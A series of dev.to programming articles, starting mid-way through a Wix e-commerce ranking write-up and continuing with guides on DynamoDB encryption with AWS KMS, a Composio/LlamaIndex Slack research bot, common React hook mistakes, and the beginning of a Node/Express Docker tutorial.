  // Section #4
  PER_PRODUCT: 5, // More products are better.

  // Section #5
  // For each product in the post
  PRODUCT_REBOUGHT: 20,
  PRODUCT_RATING_POSITIVE: 15, // Rating from 3-5.
  PRODUCT_RATING_NEGATIVE: -20, // Rating below 3.
  PRODUCT_REVIEW_COUNT: 0, // Impact to be calculated.
  PRODUCT_WISHLIST: 5,
  INVENTORY_INSTOCK: 50,
  INVENTORY_LABEL_ON_SALE: 50
}
```

#### section #1

- Likes, the number of comments, and the number of followers increase the rank based on the above weights per unit.

> Currently, follower numbers are multiplied directly by weights, but in the future, consider calculating based on percentiles to account for users with a large number of followers.

#### section #2

- Add-to-cart weight: based on the number of times other users click on a post to add all its items to their cart. This indicates user interest in the post, tracked through events to adjust ranking.

#### section #3

- Post-created weight: uses a mathematical formula to calculate post ranking based on recency. Newer posts receive a higher score, decreasing exponentially with time. For example, a post created just now might score 500, while one created an hour ago scores 491.74, reducing by about 9 points.

```javascript
function getLatestScore(date) {
  const currentTime = new Date();
  const inputDate = new Date(date);

  const initialScore = 500;
  const decayRate = 0.4 / (24 * 60 * 60); // Adjust decay rate for seconds.

  const secondsDifference = differenceInSeconds(currentTime, inputDate);
  const score = initialScore * Math.exp(-decayRate * secondsDifference);

  return round(score);
}
```

#### section #4

- Per-product weight: adjusts based on the number of line items in the cart. More items increase ranking.

#### section #5

- Product and inventory weight: a complex algorithm incorporating ratings, wishlist additions, and inventory status (in stock, on sale). Ratings below 3 negatively impact product rank, while 3-5 ratings positively influence it.

Notably, I separated product and post rankings, stored in separate databases to avoid Wix rate limits.

{% cta https://github.com/Salman2301/sharekart/blob/main/src/backend/ranks.js %} Open in GitHub {% endcta %}

{% collapsible Database structure %}

1. **global_post_rank**
  - Title (string)
  - user_post (ref)
  - Score (number)
  - Scoreinfo (object)
2. **log**
  - Mainmessage (string)
  - Trace (string)
  - Message (string[])
  - Place (string)
  - Type (string)
3. **product_rank**
  - Title (string)
  - Score (number)
  - Scoreinfo (object)
4. **user_follow**
  - Title (string)
  - follower (string - user_id)
  - followee (string - user_id)
5. **user_info**
  - Title (string)
  - displayName (string)
  - Image (string)
  - followerCount (number)
6. **user_post**
  - post (string)
  - fullname (string)
  - orderId (string)
  - Lineitems (array)
  - Total (number)
  - Raw (object)
  - Currency (string)
  - Totalprice (number)
7. **user_post_comment**
  - Title (string)
  - comment (string)
  - post (string)
  - likeCount (number)
8. **user_post_comment_like**
  - Title (string)
  - comment_like (number)
9. **user_post_event**
  - Title (string)
  - type (string)
  - Postid (string)
10. **user_post_like**
  - Title (string)
  - user_post (ref - user_post)
11. **user_review**
  - Title (string)
  - rating (number)
  - review (string)
  - tag (string[])
  - helpful (number)
  - name (string)
  - productId (string)
12. **user_review_helpful**
  - Title (string)
  - review (string)
13. **user_wishlist**
  - Title (string)
14. **user_wishlist_product**
  - Title (string)
  - wishlist (ref - user_wishlist)
  - product_id (ref stores/Product)
  - Owner (string - user_id)

{% endcollapsible %}

{% collapsible Future development ideas %}

Given more time, I would build essential features like:

- **Personalized Social Media Algorithms:** Implement algorithms that personalize the newsfeed based on each user's purchase history and product preferences.
This would enhance user engagement by showing relevant content tailored to their interests and locality.
- **Loyalty Program:** Introduce a built-in loyalty program where users whose posts receive significant likes can be rewarded with discounts. This approach incentivizes users to generate more engagement and sales, similar to an affiliate program.

These features would not only enhance the user experience but also drive more active participation and sales through the platform.

{% endcollapsible %}

## About Me

I'm a part-time freelance developer, currently building a SaaS live-streaming app in my free time. Check out my [GitHub](https://github.com/salman2301) profile and my site https://salman2301.com

If you're interested in this app or want to collaborate on similar projects, reach out via:

- Email: [admin@salman2301.com](mailto:admin@salman2301.com)
- GitHub: [salman2301](https://github.com/salman2301)
- Twitter: [salman2301](https://twitter.com/salman2301)
- LinkedIn: [asalman2301](https://linkedin.com/in/asalman2301)

Thanks to Wix for this opportunity and for positively impacting the tech industry!

> Feel free to explore the demo at [https://sharekart.salman2301.com](https://sharekart.salman2301.com). Add a product to your cart and use the promo code **ALL** to experience the functionality.
salman2301
1,920,340
Securing Data at Rest: The Importance of Encryption and How to Implement It
Introduction Keeping your data safe is essential for any organization to prevent...
0
2024-07-14T17:30:56
https://dev.to/iamsherif/securing-data-at-rest-the-importance-of-encryption-and-how-to-implement-it-81a
security, serverless, data, dynamodb
## Introduction

Keeping your data safe is essential for any organization to prevent unauthorized access and breaches. In AWS's shared security responsibility model, customers are responsible for anything they put in the cloud or connect to the cloud, while AWS is responsible for the security of the cloud. For more details, you can [read more about the AWS shared responsibility model](https://aws.amazon.com/compliance/shared-responsibility-model/).

Data at rest refers to data stored in AWS data stores, such as Amazon S3 buckets and DynamoDB. In this article, I will highlight the importance of encrypting data at rest and provide a guide on how to encrypt an [Amazon DynamoDB](https://aws.amazon.com/dynamodb/) table using a Customer Managed Key (CMK).

## Why do we need to encrypt data at rest?

AWS data stores offer encryption at rest using configurable options that we control. These encryption options leverage the AWS Key Management Service (AWS KMS) and keys that either we or AWS manage. By default, data in Amazon DynamoDB tables is fully encrypted. AWS offers several encryption tools, including [AWS Cryptographic Services and Tools](https://docs.aws.amazon.com/crypto/latest/userguide/awscryp-service-toplevel.html) and [AWS KMS](https://aws.amazon.com/kms/). In this article, we will focus on adding encryption to DynamoDB using an [AWS KMS CMK](https://docs.aws.amazon.com/kms/latest/developerguide/concepts.html#key-mgmt).

The importance of encrypting data at rest includes:

- Ensuring sensitive data stored on disks is not readable by any user or application without a valid key.
- Maintaining the confidentiality and protection of sensitive information from unauthorized access.
- Enhancing customer trust by demonstrating a commitment to data security and privacy.
- Minimizing the impact of data breaches on business operations and reputation.

## How to Encrypt a DynamoDB Table Using an AWS KMS CMK

The steps below guide you through encrypting a DynamoDB table using an AWS KMS CMK from the AWS Management Console:

### Step 1: Create an AWS KMS Customer Managed Key

1. Log in to your **AWS Management Console**.
2. **Navigate to AWS Key Management Service (KMS)** and click on **Create key**.
![Create key image on management console](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/eu5ix93fzf3ndnw5wqfq.png)
3. **Configure Key**.
![Configure key image on management console](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ewe13a98nrgihb4w3zts.png)
4. **Configure Add Labels**: Name the key "mykey".
![Configure Add Labels](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/skozjw97ltzogv74ye1s.png)
5. **Define Key Administrative Permissions and Usage Permissions**. [Read more](https://repost.aws/questions/QU4A3jhSKwRy-3vUUrS2Fqzw/assign-role-for-administrative-and-usage-permission-kms) about assigning roles for administrative and usage permissions.
6. **Review your configurations** and click **Finish**.
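If you prefer to script this step, a minimal sketch with boto3 looks like the following. The description text and region are my own placeholders; the alias matches the "mykey" name used above:

```python
# pip install boto3
import boto3

kms = boto3.client("kms", region_name="us-east-1")

# Create a symmetric customer managed key (the console's default key type)
key = kms.create_key(Description="CMK for encrypting DynamoDB data at rest")
key_id = key["KeyMetadata"]["KeyId"]

# Attach the same alias used in the console walkthrough
kms.create_alias(AliasName="alias/mykey", TargetKeyId=key_id)
print(f"Created key {key_id} with alias alias/mykey")
```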
### Step 2: Encrypt DynamoDB Table Data Using the Key

1. **Go to the DynamoDB console** and select **Tables**.
2. Click on **Create table**.
![Click on Create table](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8oa6ouvwz5sv7tjicugx.png)
3. On the next page, name your table "`myTable`" and add a partition key.
4. In **Table Settings**, click on **Customize settings**.
![Customize settings](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/s2qmm602dw5zojg4iutz.png)
5. Scroll down to **Encryption at rest** and add your custom key. Choose the key you created named "mykey".
![Add our own custom key](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/z2dhq180kvd37k0k1zuc.png)
6. Click **Create table**.
![Create table](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jfoukzvclyptnqjbcc15.png)

Your table will now be encrypted using the selected CMK.
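The console flow above can likewise be expressed in code. A hedged boto3 sketch follows; the partition key name `id` and the on-demand billing mode are illustrative choices, not from the walkthrough:

```python
import boto3

dynamodb = boto3.client("dynamodb", region_name="us-east-1")

dynamodb.create_table(
    TableName="myTable",
    AttributeDefinitions=[{"AttributeName": "id", "AttributeType": "S"}],
    KeySchema=[{"AttributeName": "id", "KeyType": "HASH"}],
    BillingMode="PAY_PER_REQUEST",
    # Encryption at rest with the customer managed key from Step 1
    SSESpecification={
        "Enabled": True,
        "SSEType": "KMS",
        "KMSMasterKeyId": "alias/mykey",
    },
)
```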
## Conclusion

Encrypting data at rest in AWS is a critical step in ensuring the security and integrity of your organization's sensitive information. By leveraging AWS KMS Customer Managed Keys (CMK), you can maintain control over your encryption keys and meet compliance requirements. This guide has walked you through the process of creating a custom key and using it to encrypt a DynamoDB table.

Implementing these encryption practices not only protects your data from unauthorized access but also enhances customer trust and minimizes the impact of potential data breaches. Prioritizing data security is essential for safeguarding your business operations and reputation.

Follow my social handles for more on AWS Serverless services. Click to follow on:

- [LinkedIn](https://www.linkedin.com/in/sherifawofiranye)
- [Twitter](https://www.x.com/awofiranyesher2)
- [Dev](https://dev.to/iamsherif)
- [Medium](https://medium.com/@awofiranyesherif4)
iamsherif
1,920,415
How to build a Perplexity-like Chatbot in Slack?
TL;DR I spend a lot of time on Slack and often need deep-researched information. For this,...
0
2024-07-16T17:17:09
https://dev.to/composiodev/how-to-build-a-perplexity-like-chatbot-in-slack-533j
webdev, python, programming, ai
## TL;DR

I spend a lot of time on Slack and often need deeply researched information. For this, I have to go to Google search and research topics manually, which seems unproductive in the age of AI. So, I built a Slack chatbot to access the internet and find relevant information with citations, similar to Perplexity.

Here's how I built it:

- Configure a SlackBot in the workspace.
- The bot forwards all the messages in the workspace to an event listener.
- Parse the information from the message events and pass it to an AI agent.
- The AI agent, equipped with tools like Exa and Tavily, searches the Internet for the topic and returns the response.
- The agent's response is then posted as a comment in the main message thread.

Try the Agent live now on Composio Playground 👇.

{% cta https://playground.composio.dev/agent/slack_assistant %} Try it now in the Playground🚀{% endcta %}

## What are AI agents?

Before going ahead, let's understand what an AI agent is. AI agents are systems powered by AI models that can autonomously perform tasks, interact with their environment, and make decisions based on their programming and the data they process.

![Slack Ritual](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/07mxd8vodn49iwmzx1wi.gif)

---

## Your AI agent tooling platform 🛠️

Composio is an open-source platform that offers over 150 production-ready tools and integrations such as GitHub, Slack, Code Interpreter, and more to empower AI agents to accomplish complex real-world workflows.

![gif](https://res.cloudinary.com/practicaldev/image/fetch/s--lP0Jf3NK--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bm9mrmovmn26izyik95z.gif)

Please help us with a star. 🥹 It would help us to create more articles like this 💖

{% cta https://github.com/ComposioHQ/composio %}Star the Composio.dev repository ⭐{% endcta %}

---

## Let's get started 🔥

Start by creating a virtual environment.

```bash
python -m venv slack-agent
cd slack-agent
source bin/activate
```

Now, install the libraries.

```bash
pip install composio-core composio-llamaindex
pip install llama-index-llms-openai python-dotenv
```

A brief description of the libraries:

- `composio-core` is the main library for accessing and configuring tools and integrations. It also has a CLI API to manage integrations and triggers conveniently.
- `composio-llamaindex` is the [LlamaIndex](https://www.llamaindex.ai/) plug-in for Composio. It lets you use all the LlamaIndex functionalities with Composio tools.
- `llama-index-llms-openai` is an additional library from LlamaIndex that enables you to use OpenAI models within its framework.
- `python-dotenv` loads environment variables from a `.env` file into your Python project's environment, making it easier to manage configuration settings.

Next, create a `.env` file and add an environment variable for the OpenAI API key.

```bash
OPENAI_API_KEY=your API key
```

## Configure the Integrations 🔧

Composio allows you to configure a SlackBot without writing any code for the integration. Composio handles all the user authentication and authorization flows, so you can focus on shipping faster.

You can do it from the terminal using Composio's dedicated CLI API. But before that, log in to Composio from the CLI and update apps by running the following commands.

```bash
composio login
composio apps update
```

Complete the login flow to use the Composio CLI API. Execute the following command to configure a SlackBot.
```bash
composio add slackbot
```

Now, finish the authentication flow to add a SlackBot integration.

Once you finish the integration flow, your live integration will appear in the [**Integrations**](https://app.composio.dev/your_apps) section.

![Composio Integrations](https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5zxg5rdgfxqdu9qw0tut.png)

Once the SlackBot is integrated, go to the apps section in your workspace, get the BOT ID, and add it to the `.env` file.

![Slack BOT ID](https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5s8kk6nhb3l15rvxahf2.jpg)

## Set up SlackBot Trigger ⚙️

Triggers are predefined conditions that activate your agents when met. Composio offers a built-in event listener to capture these trigger events.

Here, we set up one SlackBot trigger to fetch the event data when a new message is added to the workspace, and another trigger for when a new message is added to a thread. (A sketch of a handler for the thread-reply trigger is included at the end of this post.)

```
composio triggers enable slack-receive-message
composio triggers enable slackbot_receive_thread_reply
```

You can also add the triggers you need from the dashboard on the [SlackBot page](https://app.composio.dev/app/slackbot): go to the trigger section and enable them there.

![integrations page](https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fstgytn67dmz5ym6sq7q7.png)

## Building the Agentic Workflow 🏗️

Now that we have set up integrations and triggers, let's move on to the coding part.

![monkey codes](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/cjlyh0y9dlc11i0tfek8.gif)

### Step 1: Import packages and define tools

Create a `main.py` file and paste the following code.

```python
import os
from dotenv import load_dotenv

from composio_llamaindex import Action, App, ComposioToolSet
from composio.client.collections import TriggerEventData
from llama_index.core.agent import FunctionCallingAgentWorker
from llama_index.core.llms import ChatMessage
from llama_index.llms.openai import OpenAI

load_dotenv()
llm = OpenAI(model="gpt-4o")

# Bot configuration constants
BOT_USER_ID = os.environ["SLACK_BOT_ID"]  # Bot ID for Composio. Replace with your bot member ID, once the bot joins the channel.
RESPOND_ONLY_IF_TAGGED = (
    True  # Set to True to have the bot respond only when tagged in a message
)

# Initialize the Composio toolset
composio_toolset = ComposioToolSet()
composio_tools = composio_toolset.get_tools(
    apps=[App.CODEINTERPRETER, App.EXA, App.FIRECRAWL, App.TAVILY]
)
```

Here’s what is going on in the above code block:

- We imported the packages and modules needed for the project.
- Loaded the `.env` variables into the environment with `load_dotenv()`.
- Set up the global variables BOT_USER_ID and RESPOND_ONLY_IF_TAGGED.
- Initialized the Composio toolset.
- Added the Code Interpreter, Exa, Firecrawl, and Tavily services as tools.

### Step 2: Define Agents

Now define the Slack agent with the tools and the LLM.
```python
# Define the LlamaIndex function-calling agent with a system prompt for context
prefix_messages = [
    ChatMessage(
        role="system",
        content=(
            "You are now an integration agent, and whatever you are requested, you will try to execute utilizing your tools."
        ),
    )
]

agent = FunctionCallingAgentWorker(
    tools=composio_tools,
    llm=llm,
    prefix_messages=prefix_messages,
    max_function_calls=10,
    allow_parallel_tool_calls=False,
    verbose=True,
).as_agent()
```

- We defined the agent using `FunctionCallingAgentWorker` with a prefix message as the system prompt.
- This provides the LLM with additional context regarding the roles and expectations.
- The agent has been provided with the defined tools.
- The `max_function_calls` parameter caps the number of tool calls the agent can make in a single run.
- Verbosity is set to True to log the complete agent workflow.

Note: The `FunctionCallingAgentWorker` only supports LLMs with function-calling abilities, like GPT, Mistral, and Anthropic models.

### Step 3: Defining the Event Listener

The next step is to set up the event listener. This will receive the payloads from the trigger events in Slack. The payloads contain the required event information, such as channel ID, message text, timestamps, etc. You retrieve the needed information, process it, and perform actions.

```python
# Create a listener to handle Slack events and triggers for Composio
listener = composio_toolset.create_trigger_listener()

# Callback function for handling new messages in a Slack channel
@listener.callback(filters={"trigger_name": "slackbot_receive_message"})
def callback_new_message(event: TriggerEventData) -> None:
    payload = event.payload
    user_id = payload.get("event", {}).get("user", "")

    # Ignore messages from the bot itself to prevent self-responses
    if user_id == BOT_USER_ID:
        return

    message = payload.get("event", {}).get("text", "")

    # Respond only if the bot is tagged in the message, if configured to do so
    if RESPOND_ONLY_IF_TAGGED and f"<@{BOT_USER_ID}>" not in message:
        print("Bot not tagged, ignoring message")
        return

    # Extract channel and timestamp information from the event payload
    channel_id = payload.get("event", {}).get("channel", "")
    ts = payload.get("event", {}).get("ts", "")
    thread_ts = payload.get("event", {}).get("thread_ts", ts)

    # Process the message and post the response in the same channel or thread
    result = agent.chat(message)
    print(result)
    composio_toolset.execute_action(
        action=Action.SLACKBOT_CHAT_POST_MESSAGE,
        params={
            "channel": channel_id,
            "text": result.response,
            "thread_ts": thread_ts,
        },
    )

listener.listen()
```

- The callback function `callback_new_message` is invoked when the trigger event in Slack matches `slackbot_receive_message`.
- The user ID is extracted from the event payload. If it matches the bot ID, the message is skipped to prevent self-responses.
- If not, the code checks whether the message mentions the bot ID.
- We extract the message text, channel ID, and timestamps.
- The message is passed to the Slack agent you defined earlier.
- The response from the agent is then sent back to Slack.

Now, once everything is set up, run the Python file. Make sure you have set up the Slack bot correctly in your channel. Here is how you can add the Slack bot to your channel 👇.

![add slackbot](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/86n4vc24n2v4av04nfak.gif)

When you send a message in Slack tagging the bot, the event listener receives the payload, the agent acts on it, and the response is sent back to the same Slack channel. Here is a full video of the Slack bot in action.
{% embed https://x.com/GanatraSoham/status/1806468014105301334 %}

---

## Let's connect! 🔌

You can join our community to engage with maintainers and contribute as an open-source developer. Don't hesitate to visit our GitHub repository to contribute and create issues related to Composio.

The source for this tutorial is available here; also check out the implementations with other frameworks:

{% cta https://github.com/ComposioHQ/composio/blob/feat/slack-assistant/python/examples/slack_bot_agent/readme.md %} Full code of the AI Slack Bot ✨{% endcta %}

Thank you for reading!
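P.S. One loose end worth noting: we enabled the `slackbot_receive_thread_reply` trigger earlier but only registered a callback for new channel messages. Below is a minimal sketch of a second callback you could add to `main.py` above the `listener.listen()` call. It assumes the thread-reply payload mirrors the channel-message payload shown in Step 3 (the exact field names are an assumption, so verify them against a real event):

```python
# Hypothetical handler for thread replies; assumes the payload shape
# matches the channel-message payload used in callback_new_message.
@listener.callback(filters={"trigger_name": "slackbot_receive_thread_reply"})
def callback_thread_reply(event: TriggerEventData) -> None:
    payload = event.payload
    user_id = payload.get("event", {}).get("user", "")
    if user_id == BOT_USER_ID:  # skip the bot's own replies
        return
    message = payload.get("event", {}).get("text", "")
    if RESPOND_ONLY_IF_TAGGED and f"<@{BOT_USER_ID}>" not in message:
        return
    channel_id = payload.get("event", {}).get("channel", "")
    thread_ts = payload.get("event", {}).get("thread_ts", "")
    # Run the same agent and post the answer back into the same thread
    result = agent.chat(message)
    composio_toolset.execute_action(
        action=Action.SLACKBOT_CHAT_POST_MESSAGE,
        params={"channel": channel_id, "text": result.response, "thread_ts": thread_ts},
    )
```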
sunilkumrdash
1,920,465
Top 6 React Hook Mistakes Beginners Make
The hardest part about learning react is not actually learning how to use react but instead learning...
0
2024-07-14T16:46:04
https://dev.to/markliu2013/top-6-react-hook-mistakes-beginners-make-1135
react
The hardest part about learning React is not actually learning how to use React, but learning how to write good, clean React code. In this article, I will talk about 6 mistakes that I see almost everyone making with the useState and useEffect hooks.

## Mistake 1, Using state when you don't need it

The very first mistake that I want to talk about is using state when you don't actually need any state. Let's take a look at this example.

```jsx
import {useState} from "react";

const App = () => {
  const [email, setEmail] = useState('')
  const [password, setPassword] = useState('')

  function onSubmit(e) {
    e.preventDefault();
    console.log({ email, password });
  }

  return (
    <form onSubmit={onSubmit}>
      <label htmlFor="email">Email</label>
      <input value={email} onChange={e => setEmail(e.target.value)} type="email" id="email" />
      <label htmlFor="password">Password</label>
      <input value={password} onChange={e => setPassword(e.target.value)} type="password" id="password" />
      <button type="submit">Submit</button>
    </form>
  )
};

export default App;
```

We use email and password state here, but the problem is that we only care about the email and password values when the form is submitted. We don't need a re-render when email or password changes, so instead of tracking state and re-rendering every time a character is typed, I am going to store these inside of a ref.

```jsx
import { useRef } from "react";

const App = () => {
  const emailRef = useRef();
  const passwordRef = useRef();

  function onSubmit(e) {
    e.preventDefault();
    console.log({
      email: emailRef.current.value,
      password: passwordRef.current.value
    });
  }

  return (
    <form onSubmit={onSubmit}>
      <label htmlFor="email">Email</label>
      <input ref={emailRef} type="email" id="email" />
      <label htmlFor="password">Password</label>
      <input ref={passwordRef} type="password" id="password" />
      <button type="submit">Submit</button>
    </form>
  )
};

export default App;
```

If you click submit and look at the console again, it will print the values. You don't need any state at all for this. So the first tip is to ask yourself whether you really need state (and a re-render every time it changes), or whether a ref will do when no re-render is needed. You can also access the form data directly, so you don't even need refs:

```jsx
const App = () => {
  function onSubmit(event) {
    event.preventDefault();
    const data = new FormData(event.target);
    console.log(data.get('email'));
    console.log(data.get('password'));
    fetch('/api/form-submit-url', {
      method: 'POST',
      body: data,
    });
  }

  return (
    <form onSubmit={onSubmit}>
      <label htmlFor="email">Email</label>
      <input type="email" name="email" id="email" />
      <label htmlFor="password">Password</label>
      <input type="password" name="password" id="password" />
      <button type="submit">Submit</button>
    </form>
  )
};

export default App;
```

## Mistake 2, Not using the function version of useState

Let's take a look at this example.

```jsx
import { useState } from "react";

export function Counter() {
  const [count, setCount] = useState(0);

  function adjustCount(amount) {
    setCount(count + amount);
    setCount(count + amount);
  }

  return (
    <>
      <button onClick={ () => adjustCount(-1) }> - </button>
      <span> {count} </span>
      <button onClick={ () => adjustCount(1) }> + </button>
    </>
  )
}
```

If you click the button, the count will update only once, even though you call `setCount` twice. This is because both calls read the same stale `count` value from the current render; by the time the second `setCount` runs, the first update has not been applied yet.
You should use the functional update form to fix this problem. https://legacy.reactjs.org/docs/hooks-reference.html#functional-updates

```jsx
import { useState } from "react";

export function Counter() {
  const [count, setCount] = useState(0);

  function adjustCount(amount) {
    setCount(prevCount => prevCount + amount);
    setCount(prevCount => prevCount + amount);
  }

  return (
    <>
      <button onClick={ () => adjustCount(-1) }> - </button>
      <span> {count} </span>
      <button onClick={ () => adjustCount(1) }> + </button>
    </>
  )
}
```

## Mistake 3, State does not update immediately

Let's take a look at this example.

```jsx
import { useState } from "react";

export function Counter() {
  const [count, setCount] = useState(0);

  function adjustCount(amount) {
    setCount(prevCount => prevCount + amount);
    // count is still the value from before setCount
    console.log(count);
  }

  return (
    <>
      <button onClick={ () => adjustCount(-1) }> - </button>
      <span> {count} </span>
      <button onClick={ () => adjustCount(1) }> + </button>
    </>
  )
}
```

When you update your state variable, it doesn't actually change right away; it doesn't change until the next render. So instead of putting code that depends on the new value right after your state setter, you should use useEffect.

```jsx
import {useEffect, useState} from "react";

export function Counter() {
  const [count, setCount] = useState(0);

  useEffect(() => {
    console.log(count);
  }, [count])

  function adjustCount(amount) {
    setCount(prevCount => prevCount + amount);
  }

  return (
    <>
      <button onClick={ () => adjustCount(-1) }> - </button>
      <span> {count} </span>
      <button onClick={ () => adjustCount(1) }> + </button>
    </>
  )
}
```

## Mistake 4, Unnecessary useEffect

Let's take a look at this example.

```jsx
import { useEffect, useState } from "react";

const App = () => {
  const [firstName, setFirstName] = useState('')
  const [lastName, setLastName] = useState('')
  const [fullName, setFullName] = useState('')

  useEffect(() => {
    setFullName(`${firstName} ${lastName}`);
  }, [firstName, lastName])

  return (
    <>
      <input value={firstName} onChange={ e => setFirstName(e.target.value) } />
      <input value={lastName} onChange={ e => setLastName(e.target.value) } />
      {fullName}
    </>
  )
};

export default App;
```

The problem is that when we update firstName or lastName, the fullName state updates afterwards and re-renders the component again, so the component renders twice. Here's how to make it optimal: derive fullName during render instead.

```jsx
import { useState } from "react";

const App = () => {
  const [firstName, setFirstName] = useState('');
  const [lastName, setLastName] = useState('');
  const fullName = `${firstName} ${lastName}`;

  return (
    <>
      <input value={firstName} onChange={ e => setFirstName(e.target.value) } />
      <input value={lastName} onChange={ e => setLastName(e.target.value) } />
      {fullName}
    </>
  )
};

export default App;
```

## Mistake 5, Referential equality mistakes

Let's take a look at this example.

```jsx
import {useEffect, useState} from "react";

const App = () => {
  const [age, setAge] = useState(0);
  const [name, setName] = useState('');
  const [darkMode, setDarkMode] = useState(false);

  const person = { age, name };

  useEffect(() => {
    console.log(person)
  }, [person])

  return (
    <div style={{ background: darkMode ?
"#333" : "#fff" }}> Age: {" "} <input value={age} type="number" onChange={ e => setAge(e.target.value)} /> <br/> Name: <input value={name} onChange={ e => setName(e.target.value) } /> <br/> Dark Mode: {" "} <input type="checkbox" value={darkMode} onChange={e => setDarkMode(e.target.checked)} /> </div> ) }; export default App; ``` If you change age or name, useEffect function will be triggered, but if you toggle darkMode, the useEffect function triggered too, this is not what we expected. There are two key point make this happen. Firstly, Each render has its own props and state, so the variable person will be initialize as a new one. Checkout this article, if you want to study this in detail, [https://overreacted.io/a-complete-guide-to-useeffect/](https://overreacted.io/a-complete-guide-to-useeffect) The second point is Referential equality, [https://barker.codes/blog/referential-equality-in-javascript/](https://barker.codes/blog/referential-equality-in-javascript/) so the variable person is not equal when darkMode updated. We can use [useMemo](https://react.dev/reference/react/useMemo) to fix this problem. ```jsx import {useEffect, useMemo, useState} from "react"; const App = () => { const [age, setAge] = useState(0); const [name, setName] = useState(''); const [darkMode, setDarkMode] = useState(false); const person = useMemo(() => { return { age, name } }, [age, name]) useEffect(() => { console.log(person) }, [person]) return ( <div style={{ background: darkMode ? "#333" : "#fff" }}> Age: {" "} <input value={age} type="number" onChange={ e => setAge(e.target.value)} /> <br/> Name: <input value={name} onChange={ e => setName(e.target.value) } /> <br/> Dark Mode: {" "} <input type="checkbox" value={darkMode} onChange={e => setDarkMode(e.target.checked)} /> </div> ) }; export default App; ``` ## Mistake 6, Not aborting fetch requests Let's take a look at this example. ```jsx import {useEffect, useState} from "react"; export function useFetch(url) { const [loading, setLoading] = useState(true); const [data, setData] = useState(); const [error, setError] = useState(); useEffect(() => { setLoading(true) fetch(url) .then(setData) .catch(setError) .finally(() => setLoading(false)) }, [url]) } ``` The problem in this example is when the component unmounted, or url changed, the previous fetch still working in the background, it will work not as expect in many situation, checkout out this article in detail, https://plainenglish.io/community/how-to-cancel-fetch-and-axios-requests-in-react-useeffect-hook We can fix this problem using AbortController. ```jsx import {useEffect, useState} from "react"; export function useFetch(url) { const [loading, setLoading] = useState(true); const [data, setData] = useState(); const [error, setError] = useState(); useEffect(() => { const controller = new AbortController(); setLoading(true) fetch(url, { signal: controller.signal }) .then(setData) .catch(setError) .finally(() => setLoading(false)) return () => { controller.abort(); } }, [url]) } ``` This article is based on this youtube video. https://www.youtube.com/watch?v=GGo3MVBFr1A
markliu2013
1,920,504
Node Docker App
Our Funda is very simple. Just create a simple nodeJs app and dockerize it docker hub😘 ... Step 0:...
0
2024-07-13T05:00:00
https://dev.to/nisharga_kabir/node-docker-app-2f1e
docker, nodeapp, node, javascript
Our funda is very simple. Just create a simple NodeJS app and dockerize it to Docker Hub 😘 ... Step 0: create a folder, create a package.json file, and copy this code

```
{
  "name": "nodejs-image-demo",
  "version": "1.0.0",
  "description": "nodejs image demo",
  "author": "Nisharga Kabir",
  "license": "MIT",
  "main": "app.js",
  "keywords": [
    "nodejs",
    "bootstrap",
    "express"
  ],
  "dependencies": {
    "express": "^4.16.4"
  }
}
```

then run this command

```
npm install
```

This is nothing special... just `npm init` plus answering a few questions would get us the same thing, but to move fast we skip that process.

Please make sure you have installed Node.js and Docker on your PC. (You will find lots of videos on YouTube about installing Docker and Node.js.)

Let's Start the Game 😍😍😍

## Step 1: create **app.js** on root and paste this code

```
const express = require("express");
const app = express();
const router = express.Router();

const path = __dirname + "/views/";
const port = 8080;

router.use(function (req, res, next) {
  console.log("/" + req.method);
  next();
});

router.get("/", function (req, res) {
  res.sendFile(path + "index.html");
});

router.get("/sharks", function (req, res) {
  res.sendFile(path + "sharks.html");
});

app.use(express.static(path));
app.use("/", router);

app.listen(port, function () {
  console.log("Example app listening on port 8080!");
});
```

This code is simple. First, we do a basic setup of Express. Then we define the path and port for future use; `__dirname` is the absolute path of the current directory. Next, we use console.log to see which request is being made. Using res.sendFile we map `/` to index.html and `/sharks` to sharks.html. Finally, we serve static files from the path and mount the router with `app.use`.

## Step 2: create two files, **views/index.html** and **views/sharks.html** (make sure to create the views folder)

**index.html**

```
<!DOCTYPE html>
<html lang="en">
<head>
    <title>About Sharks</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
    <link href="css/styles.css" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css?family=Merriweather:400,700" rel="stylesheet" type="text/css">
</head>
<body>
<nav class="navbar navbar-dark bg-dark navbar-static-top navbar-expand-md">
    <div class="container">
        <button type="button" class="navbar-toggler collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
            <span class="sr-only">Toggle navigation</span>
        </button>
        <a class="navbar-brand" href="#">Everything Sharks</a>
        <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
            <ul class="nav navbar-nav mr-auto">
                <li class="active nav-item"><a href="/" class="nav-link">Home</a>
                </li>
                <li class="nav-item"><a href="/sharks" class="nav-link">Sharks</a>
                </li>
            </ul>
        </div>
    </div>
</nav>
<div class="jumbotron">
    <div class="container">
        <h1>Want to Learn About Sharks?</h1>
        <p>Are you ready to learn about sharks?</p>
        <br>
